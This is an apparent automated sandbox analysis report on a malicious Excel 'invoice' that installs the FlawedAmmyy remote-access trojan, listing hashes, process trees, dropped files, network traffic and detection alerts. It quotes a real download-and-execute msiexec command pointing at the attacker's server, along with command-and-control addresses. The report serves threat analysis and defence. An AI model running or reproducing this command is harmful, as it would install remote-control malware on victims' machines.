File name: | 인보이스 18-02-2019.xls |
Full analysis: | https://app.any.run/tasks/fe71fc3a-2f53-4305-b005-01907d5c3f57 |
Verdict: | Malicious activity |
Threats: | FlawedAmmmyy is a RAT type malware that can be used to perform actions remotely on an infected PC. This malware is well known for being featured in especially large campaigns with wide target demographics. |
Analysis date: | February 18, 2019, 23:40:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Mon Feb 18 21:53:20 2019, Security: 0 |
MD5: | DF84893D492A78EA417ED9D185946B5D |
SHA1: | 065FEE06DA93ADFF3F0B64A307333816118E7688 |
SHA256: | 14A577109DE5CBBD1A642C638850C42F5B0CC335D8A3572EC23228786BAC1D41 |
SSDEEP: | 3072:9Kpb8rGYrMPelwhKmFV5xtezEsgrdgLiiiiiii3kZOeX7+93plBiFUq0oXGK:9Kpb8rGYrMPelwhKmFV5xtuEsgrdgLi4 |
.xls | | | Microsoft Excel sheet (78.9) |
---|
Author: | Microsoft Office |
---|---|
LastModifiedBy: | 1 |
Software: | Microsoft Excel |
CreateDate: | 2018:12:19 10:42:12 |
ModifyDate: | 2019:02:18 21:53:20 |
Security: | None |
CodePage: | Windows Cyrillic |
Company: | Microsoft Corporation |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2988 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3592 | msiexec.exe val=conn rdp=redim OnLoad='c:\windows\cmd.exe' /i http://185.17.120.235/select /q | C:\Windows\system32\msiexec.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
2712 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255) | ||||
304 | "C:\Windows\Installer\MSIF227.tmp" | C:\Windows\Installer\MSIF227.tmp | msiexec.exe | |
User: admin Company: IBM Controler' System Security Control Integrity Level: MEDIUM Description: IBM Controler' System Security Control Exit code: 0 Version: 2.8.17228.1 | ||||
3508 | "C:\ProgramData\Microsofts Help\wsus.exe" | C:\ProgramData\Microsofts Help\wsus.exe | MSIF227.tmp | |
User: admin Company: Microsoft Block Security Integrity Level: MEDIUM Description: Microsoft Block Security Version: 1.18.2.51920 | ||||
2708 | "C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSIF227.tmp >> NUL | C:\Windows\system32\cmd.exe | — | MSIF227.tmp |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2380 | "C:\Windows\system32\cmd.exe" /c del C:\Windows\INSTAL~1\MSIF227.tmp >> NUL | C:\Windows\system32\cmd.exe | — | MSIF227.tmp |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2616 | "C:\ProgramData\Microsofts Help\wsus.exe" | C:\ProgramData\Microsofts Help\wsus.exe | — | taskeng.exe |
User: admin Company: Microsoft Block Security Integrity Level: MEDIUM Description: Microsoft Block Security Exit code: 0 Version: 1.18.2.51920 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2988 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE591.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2712 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF7337BB2325EEA38C.TMP | — | |
MD5:— | SHA256:— | |||
2712 | msiexec.exe | C:\Config.Msi\20f051.rbs | — | |
MD5:— | SHA256:— | |||
2712 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF9494A9014C38726F.TMP | — | |
MD5:— | SHA256:— | |||
2712 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Cookies\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A | |||
2712 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat | dat | |
MD5:424FD4BCB542B0E8FB8C760B0B253998 | SHA256:B732FBC48B21EBE7D49B44149888AF15A64160D952C483B7C410731302F2911F | |||
2712 | msiexec.exe | C:\Windows\Installer\MSIEE0D.tmp | executable | |
MD5:B5C26AEC13F40EF2976DB230A54C2DA5 | SHA256:5A17C9FF6F6FE7C4FF38FF625531E3AD22E158E406517E039FB2995E5E073782 | |||
2712 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\History\History.IE5\index.dat | dat | |
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862 | SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A | |||
304 | MSIF227.tmp | C:\Windows\Tasks\Microsoft System Protect.job | binary | |
MD5:926D7C2B9AB03F53B530F3640C35DC53 | SHA256:39A3F1C1F426B3DD5F4DCD5A668F506E6A274B1C812F453DD574F06304E565CC | |||
304 | MSIF227.tmp | C:\ProgramData\Microsofts Help\wsus.exe | executable | |
MD5:B24C094439AF3DA39612D5B4E1523A3D | SHA256:56B57FC829774AA4423B7A29FF5A081B75167D2466898ACBC7D89E717BFB4869 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2712 | msiexec.exe | GET | 200 | 185.17.120.235:80 | http://185.17.120.235/select | RU | executable | 168 Kb | suspicious |
304 | MSIF227.tmp | GET | 200 | 185.17.120.235:80 | http://185.17.120.235/dat3.omg | RU | binary | 657 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
304 | MSIF227.tmp | 185.17.120.235:80 | — | Leaseweb Deutschland GmbH | RU | suspicious |
3508 | wsus.exe | 169.239.129.31:80 | — | Zappie Host LLC | ZA | malicious |
2712 | msiexec.exe | 185.17.120.235:80 | — | Leaseweb Deutschland GmbH | RU | suspicious |
PID | Process | Class | Message |
---|---|---|---|
2712 | msiexec.exe | Misc activity | SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file |
2712 | msiexec.exe | Potential Corporate Privacy Violation | POLICY [PTsecurity] Executable application_x-msi Download |
3508 | wsus.exe | A Network Trojan was detected | MALWARE [PTsecurity] FlawedAmmyy.RAT |
3508 | wsus.exe | A Network Trojan was detected | MALWARE [PTsecurity] AMMYY RAT |
3508 | wsus.exe | A Network Trojan was detected | ET TROJAN Win32/FlawedAmmyy RAT CnC Checkin |
3508 | wsus.exe | A Network Trojan was detected | MALWARE [PTsecurity] FlawedAmmyy.RAT Checkin |
Process | Message |
---|---|
MSIF227.tmp | C:\ProgramData\Microsofts Help\template_81e330.DATAHASH |
MSIF227.tmp | --End Dowload-- |